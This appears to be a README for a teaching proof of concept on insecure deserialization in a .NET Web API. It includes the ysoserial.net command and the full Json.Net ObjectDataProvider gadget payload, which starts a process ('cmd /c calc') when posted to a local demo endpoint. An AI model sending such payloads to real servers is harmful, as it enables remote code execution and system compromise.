Insecure deserialization is a severe issue, which allows an attacker to exploit a server just by sending a malicious JSON. This is a new issue in the OWASP Top 10 2017 release - A8. This POC is built based on a white paper from BlackHat USA 2017 talk. You can find a recording of the talk here - this recording is from AppSec USA 2017.
- Use VS to open the solution and launch the server.
- Use curl/postman to send malicious request to the API.
This is an example payload, as generated by ysoserial.net.
To generate it, I used the following command: ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc":
{
"body": {
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName": "Start",
"MethodParameters": {
"$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"$values": [
"cmd",
"/c calc"
]
},
"ObjectInstance": {
"$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
}
}
}
Post this payload to http://localhost:8085/api/hello.
A new calc instance should be open.